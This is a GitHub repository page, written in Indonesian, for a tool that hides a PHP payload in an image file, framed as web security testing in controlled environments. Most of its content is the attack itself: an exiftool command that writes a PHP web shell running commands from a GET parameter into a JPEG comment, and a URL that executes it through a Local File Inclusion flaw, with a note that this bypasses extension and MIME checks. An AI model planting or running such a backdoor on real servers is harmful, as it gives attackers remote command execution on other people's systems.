Skip to content

Steganografi untuk menyisipkan payload PHP dalam file gambar, digunakan untuk pengujian keamanan web di lingkungan terkontrol.

Notifications You must be signed in to change notification settings

galihap76/stego-php-payload

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 

Repository files navigation

Stego PHP Payload

Steganografi untuk menyisipkan payload PHP dalam file gambar, digunakan untuk pengujian keamanan web di lingkungan terkontrol.

Payload

Sisipkan backdoor kedalam sebuah file gambar dengan Exiftool :

exiftool -Comment='<?php system($_GET["cmd"]); ?>' kucing.jpg -o shell.jpg

Eksekusi

Eksekusi backdoor pada file gambar melalui celah Local File Inclusion (LFI). Meskipun terdapat validasi ekstensi dan MIME type, serangan tetap dimungkinkan karena adanya kerentanan LFI :

https://example.com/index.php?page=uploads/shell.jpg&cmd=whoami

About

Steganografi untuk menyisipkan payload PHP dalam file gambar, digunakan untuk pengujian keamanan web di lingkungan terkontrol.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages